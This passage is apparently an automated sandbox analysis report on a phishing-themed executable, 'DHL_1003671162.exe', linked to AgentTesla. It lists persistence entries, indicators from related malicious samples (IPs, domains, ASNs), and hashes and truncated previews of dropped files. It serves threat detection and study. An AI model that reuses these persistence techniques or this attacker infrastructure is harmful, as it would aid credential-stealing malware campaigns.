                                              06:15:22AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run boqXv C:\Users\user\AppData\Roaming\boqXv\boqXv.exe
                                              07:15:09API Interceptor21x Sleep call for process: DHL_1003671162.exe modified
                                              07:15:11API Interceptor16x Sleep call for process: powershell.exe modified
                                              07:15:13API Interceptor18x Sleep call for process: qmUxKv.exe modified
                                              07:15:22API Interceptor35x Sleep call for process: boqXv.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              50.87.253.2392UHM2qaBWc.exeGet hashmaliciousFormBookBrowse
                                              • www.nzhorrorfan.com/g22y/?7nr=UlSpjty&DVo=duzldioexDDlB4DMbPZnZ3oFioc8ODg8sXLpFdRenDAB6KcB0Wl7OltmwVmSQUiOOLKB
                                              SD 1476187 85250296 MV ORIENT GLORY.xlsxGet hashmaliciousFormBookBrowse
                                              • www.180cliniconline.com/aky/?pL08=Cv0e5xcycHu/jj9c+Bm6TZuJ2sSpc7+qQNv7jFIv1TirEUN5Q8TsPaCd/DQVlMEaxK1KhA==&PJ=zXd8_XtXO
                                              yaQjVEGNEb.exeGet hashmaliciousFormBookBrowse
                                              • www.180cliniconline.com/aky/?3fcl7=Cv0e5xc3cAu7jzxQ8Bm6TZuJ2sSpc7+qQN3r/GUuxziqElh/XsCgZe6f8m8p+swp+Lg6&9r4LE=B8xX4PgPJ2gdf

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              mail.clslk.comI-IN-6757165752-DEL983527_20240416074318.exeGet hashmaliciousAgentTeslaBrowse
                                              • 50.87.253.239
                                              SecuriteInfo.com.PWSX-gen.32561.14552.exeGet hashmaliciousAgentTeslaBrowse
                                              • 50.87.253.239
                                              DN.exeGet hashmaliciousAgentTeslaBrowse
                                              • 50.87.253.239
                                              SecuriteInfo.com.Win32.TrojanX-gen.32302.18886.exeGet hashmaliciousAgentTeslaBrowse
                                              • 50.87.253.239
                                              SecuriteInfo.com.Trojan.MulDropNET.68.28054.3825.exeGet hashmaliciousAgentTeslaBrowse
                                              • 50.87.253.239
                                              Consignment 5059367692.exeGet hashmaliciousAgentTeslaBrowse
                                              • 50.87.253.239
                                              DHL - 1ST PAYMENT REMINDER - 1003671162.exeGet hashmaliciousAgentTeslaBrowse
                                              • 50.87.253.239
                                              5059367692.exeGet hashmaliciousAgentTeslaBrowse
                                              • 50.87.253.239
                                              5059367692.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                              • 50.87.253.239
                                              SecuriteInfo.com.Heur.21175.21812.exeGet hashmaliciousAgentTeslaBrowse
                                              • 50.87.253.239

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              UNIFIEDLAYER-AS-1US1000901 LIQUIDACION.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                              • 162.241.253.78
                                              FT. 40FE CNY .xlsx.lnkGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                              • 192.185.124.132
                                              CREDIT NOTE.exeGet hashmaliciousAgentTeslaBrowse
                                              • 192.185.129.60
                                              Total Invoices.exeGet hashmaliciousAgentTeslaBrowse
                                              • 192.185.129.60
                                              knfV5IVjEV.lnkGet hashmaliciousUnknownBrowse
                                              • 162.241.216.65
                                              http://www.noahsarkademy.comGet hashmaliciousUnknownBrowse
                                              • 69.49.230.31
                                              CR-FEDEX_TN-775720741041.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                              • 192.185.13.234
                                              Wire Transfer Payment Receipt#2024-22-04.exeGet hashmaliciousAgentTeslaBrowse
                                              • 162.144.15.164
                                              DHL_RF_20200712_BN_OTN 0095673441.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                              • 192.185.13.234
                                              https://c8rzg8yq.r.us-east-1.awstrack.me/L0/https:%2F%2Fimaot.co.il%2FContentArea%2FBannerClick%3FBannerId=437%26BannerType=CookbookBanner%26ContentAreaId=74%26SiteUrl=mexperiencia.com%2Felvisa%2F451c858f52d4a1deb2b006143366fdc7%2F6VrgwA%2FcnRpdUB6ZW5kZXNrLmNvbQ==/1/0100018ef745f143-c3ec9f00-7fd4-48c1-9788-f0017cd20054-000000/By5Tv4iHSsE-ml_PGFCkji_Ea6g=370Get hashmaliciousUnknownBrowse
                                              • 162.241.225.201

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DHL_1003671162.exe.log

                                              Download File
                                              Process:C:\Users\user\Desktop\DHL_1003671162.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:modified
                                              Size (bytes):1415
                                              Entropy (8bit):5.352427679901606
                                              Encrypted:false
                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRuAE4KzecKIE4oKNzKorE4x84j:MIHK5HKH1qHiYHKh3oPHKMRuAHKzectP
                                              MD5:3978978DE913FD1C068312697D6E5917
                                              SHA1:1DABBE7FB8F38F6EBF474CE5F0ECAA89F48E2538
                                              SHA-256:33B7B1668DDD3AB39711F9F93B667F6F2F674348A79228BFA163BA625B37F120
                                              SHA-512:78694B97F5D03758F503155E5CE5B85AABDF9690F0DFBC51FCE9926BE2D86BCF99E008659420F1E8489A7F6EA125F2776D4C6DC4B151566B529454512352953D
                                              Malicious:false
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll"

                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\boqXv.exe.log

                                              Download File
                                              Process:C:\Users\user\AppData\Roaming\boqXv\boqXv.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1415
                                              Entropy (8bit):5.352427679901606
                                              Encrypted:false
                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRuAE4KzecKIE4oKNzKorE4x84j:MIHK5HKH1qHiYHKh3oPHKMRuAHKzectP
                                              MD5:3978978DE913FD1C068312697D6E5917
                                              SHA1:1DABBE7FB8F38F6EBF474CE5F0ECAA89F48E2538
                                              SHA-256:33B7B1668DDD3AB39711F9F93B667F6F2F674348A79228BFA163BA625B37F120
                                              SHA-512:78694B97F5D03758F503155E5CE5B85AABDF9690F0DFBC51FCE9926BE2D86BCF99E008659420F1E8489A7F6EA125F2776D4C6DC4B151566B529454512352953D
                                              Malicious:false
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll"

                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\qmUxKv.exe.log

                                              Download File
                                              Process:C:\Users\user\AppData\Roaming\qmUxKv.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:modified
                                              Size (bytes):1415
                                              Entropy (8bit):5.352427679901606
                                              Encrypted:false
                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRuAE4KzecKIE4oKNzKorE4x84j:MIHK5HKH1qHiYHKh3oPHKMRuAHKzectP
                                              MD5:3978978DE913FD1C068312697D6E5917
                                              SHA1:1DABBE7FB8F38F6EBF474CE5F0ECAA89F48E2538
                                              SHA-256:33B7B1668DDD3AB39711F9F93B667F6F2F674348A79228BFA163BA625B37F120
                                              SHA-512:78694B97F5D03758F503155E5CE5B85AABDF9690F0DFBC51FCE9926BE2D86BCF99E008659420F1E8489A7F6EA125F2776D4C6DC4B151566B529454512352953D
                                              Malicious:false
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll"

                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):2232
                                              Entropy (8bit):5.379401388151058
                                              Encrypted:false
                                              SSDEEP:48:fWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMugei/ZPUyus:fLHxvIIwLgZ2KRHWLOugss
                                              MD5:AE6DF85157F6BF3C6D9A1FF77B6B442B
                                              SHA1:16EFB3DD6B191D135EBB0D3E01C0B86EA3E7DFEC
                                              SHA-256:807D3BFCD4C81BBB6C2FA2A9D79D08CB3040DB48512304EA5ADEF746DAD879AE
                                              SHA-512:0DA4437659BC9636F6EC248C482935ADDAD8DB2FC69F5F663553D0ED10D6A955B2CF6C8661ED9E6135DC64D3FE6895EC88443B5C7C947B2B08EB291193670C7E
                                              Malicious:false
                                              Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3yqn1xl1.2cw.ps1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a0awgqk0.nll.ps1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cwg340ft.njq.psm1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uaeswejy.dxd.psm1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\tmp3999.tmp

                                              Download File
                                              Process:C:\Users\user\Desktop\DHL_1003671162.exe
                                              File Type:XML 1.0 document, ASCII text
                                              Category:dropped
                                              Size (bytes):1572
                                              Entropy (8bit):5.113532252556436
                                              Encrypted:false
                                              SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaZVxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTmrv
                                              MD5:89FEF81066306B1759BE0856C8FE5E78
                                              SHA1:4145ED14D6F8002F26DB2FBA3C69CD600D147443
                                              SHA-256:9386161F71530D91BD7E9E4E71B1A4BF5BFB8A5ADEC85F5AD805C53B26C9B297
                                              SHA-512:AA7240B765D7564230CB6EB4117B8D013F8209212620E7636ED65B2C40FB9C77D24B53304A4C8DBB35E40E6FC26C49DE05AABB0F323FC850667DD93E71E875CB
                                              Malicious:true
                                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                              C:\Users\user\AppData\Local\Temp\tmp46C8.tmp

                                              Download File
                                              Process:C:\Users\user\AppData\Roaming\qmUxKv.exe
                                              File Type:XML 1.0 document, ASCII text
                                              Category:dropped
                                              Size (bytes):1572
                                              Entropy (8bit):5.113532252556436
                                              Encrypted:false
                                              SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaZVxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTmrv
                                              MD5:89FEF81066306B1759BE0856C8FE5E78
                                              SHA1:4145ED14D6F8002F26DB2FBA3C69CD600D147443
                                              SHA-256:9386161F71530D91BD7E9E4E71B1A4BF5BFB8A5ADEC85F5AD805C53B26C9B297
                                              SHA-512:AA7240B765D7564230CB6EB4117B8D013F8209212620E7636ED65B2C40FB9C77D24B53304A4C8DBB35E40E6FC26C49DE05AABB0F323FC850667DD93E71E875CB
                                              Malicious:false
                                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                              C:\Users\user\AppData\Local\Temp\tmp6C70.tmp

                                              Download File
                                              Process:C:\Users\user\AppData\Roaming\boqXv\boqXv.exe
                                              File Type:XML 1.0 document, ASCII text
                                              Category:dropped
                                              Size (bytes):1572
                                              Entropy (8bit):5.113532252556436
                                              Encrypted:false
                                              SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaZVxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTmrv
                                              MD5:89FEF81066306B1759BE0856C8FE5E78
                                              SHA1:4145ED14D6F8002F26DB2FBA3C69CD600D147443
                                              SHA-256:9386161F71530D91BD7E9E4E71B1A4BF5BFB8A5ADEC85F5AD805C53B26C9B297
                                              SHA-512:AA7240B765D7564230CB6EB4117B8D013F8209212620E7636ED65B2C40FB9C77D24B53304A4C8DBB35E40E6FC26C49DE05AABB0F323FC850667DD93E71E875CB
                                              Malicious:false
                                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                              C:\Users\user\AppData\Local\Temp\tmp8A0A.tmp

                                              Download File
                                              Process:C:\Users\user\AppData\Roaming\boqXv\boqXv.exe
                                              File Type:XML 1.0 document, ASCII text
                                              Category:dropped
                                              Size (bytes):1572
                                              Entropy (8bit):5.113532252556436
                                              Encrypted:false
                                              SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaZVxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTmrv
                                              MD5:89FEF81066306B1759BE0856C8FE5E78
                                              SHA1:4145ED14D6F8002F26DB2FBA3C69CD600D147443
                                              SHA-256:9386161F71530D91BD7E9E4E71B1A4BF5BFB8A5ADEC85F5AD805C53B26C9B297
                                              SHA-512:AA7240B765D7564230CB6EB4117B8D013F8209212620E7636ED65B2C40FB9C77D24B53304A4C8DBB35E40E6FC26C49DE05AABB0F323FC850667DD93E71E875CB
                                              Malicious:false
                                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                              C:\Users\user\AppData\Roaming\boqXv\boqXv.exe

                                              Download File
                                              Process:C:\Users\user\Desktop\DHL_1003671162.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):840704
                                              Entropy (8bit):7.457785624084394
                                              Encrypted:false
                                              SSDEEP:12288:KVF9WM+YLoxLQE5VT0kAEXSk5SHkXuusBOlWzMIhnc:E2M+RLZVT0xMbSC69znh
                                              MD5:1D584D84D4965E7A0DA615B32AB85F2E
                                              SHA1:BBB9C2211444450BB34A27F1A98D778E3C96B9BB
                                              SHA-256:061087CD835ABCFC3411F0EC4B15CCF80516276A356B2EEDC4CB444D0DAC0187
                                              SHA-512:69C79F42F6F91AB4EA8F2FC8D80C2423450FB8FC5B9BCB7A0DD0CD3C11167947402E7D027CCFD5EC4A7303AC3F269DEFDD7A63902272D6B60C660500C84EBBC8
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 63%
                                              • Antivirus: Virustotal, Detection: 58%, Browse
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....L'f.................4...........R... ...`....@.. ....................... ............@.................................HR..W....`.............................................................................. ............... ..H............text....2... ...4.................. ..`.rsrc.......`.......6..............@..@.reloc..............................@..B.................R......H.......X....<...........w..............................................z.(......}.....(....o....}....*..0...........{............3.....(.....*..................0...........{......,....f.........}......}......}.......s....o....}.......}....8......{....o....}......{....}......}.............}.....{........Y}.....{....-...+H.{........{....X.{....X .;.|.{....Xa}......}.....{....o[...:q....(....+..(........}.........(......*................n..}.....{....,..{....oK...*..{....*.s..

                                              C:\Users\user\AppData\Roaming\boqXv\boqXv.exe:Zone.Identifier

                                              Download File
                                              Process:C:\Users\user\Desktop\DHL_1003671162.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:modified
                                              Size (bytes):26
                                              Entropy (8bit):3.95006375643621
                                              Encrypted:false
                                              SSDEEP:3:ggPYV:rPYV
                                              MD5:187F488E27DB4AF347237FE461A079AD
                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                              Malicious:true
                                              Preview:[ZoneTransfer]....ZoneId=0

                                              C:\Users\user\AppData\Roaming\qmUxKv.exe

                                              Download File
                                              Process:C:\Users\user\Desktop\DHL_1003671162.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):840704
                                              Entropy (8bit):7.457785624084394
                                              Encrypted:false
                                              SSDEEP:12288:KVF9WM+YLoxLQE5VT0kAEXSk5SHkXuusBOlWzMIhnc:E2M+RLZVT0xMbSC69znh
                                              MD5:1D584D84D4965E7A0DA615B32AB85F2E
                                              SHA1:BBB9C2211444450BB34A27F1A98D778E3C96B9BB
                                              SHA-256:061087CD835ABCFC3411F0EC4B15CCF80516276A356B2EEDC4CB444D0DAC0187
                                              SHA-512:69C79F42F6F91AB4EA8F2FC8D80C2423450FB8FC5B9BCB7A0DD0CD3C11167947402E7D027CCFD5EC4A7303AC3F269DEFDD7A63902272D6B60C660500C84EBBC8
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 63%
                                              • Antivirus: Virustotal, Detection: 58%, Browse
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....L'f.................4...........R... ...`....@.. ....................... ............@.................................HR..W....`.............................................................................. ............... ..H............text....2... ...4.................. ..`.rsrc.......`.......6..............@..@.reloc..............................@..B.................R......H.......X....<...........w..............................................z.(......}.....(....o....}....*..0...........{............3.....(.....*..................0...........{......,....f.........}......}......}.......s....o....}.......}....8......{....o....}......{....}......}.............}.....{........Y}.....{....-...+H.{........{....X.{....X .;.|.{....Xa}......}.....{....o[...:q....(....+..(........}.........(......*................n..}.....{....,..{....oK...*..{....*.s..

                                              C:\Users\user\AppData\Roaming\qmUxKv.exe:Zone.Identifier

                                              Download File
                                              Process:C:\Users\user\Desktop\DHL_1003671162.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):26
                                              Entropy (8bit):3.95006375643621
                                              Encrypted:false
                                              SSDEEP:3:ggPYV:rPYV
                                              MD5:187F488E27DB4AF347237FE461A079AD
                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                              Malicious:false
                                              Preview:[ZoneTransfer]....ZoneId=0

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Entropy (8bit):7.457785624084394
                                              TrID:
                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                              • DOS Executable Generic (2002/1) 0.01%
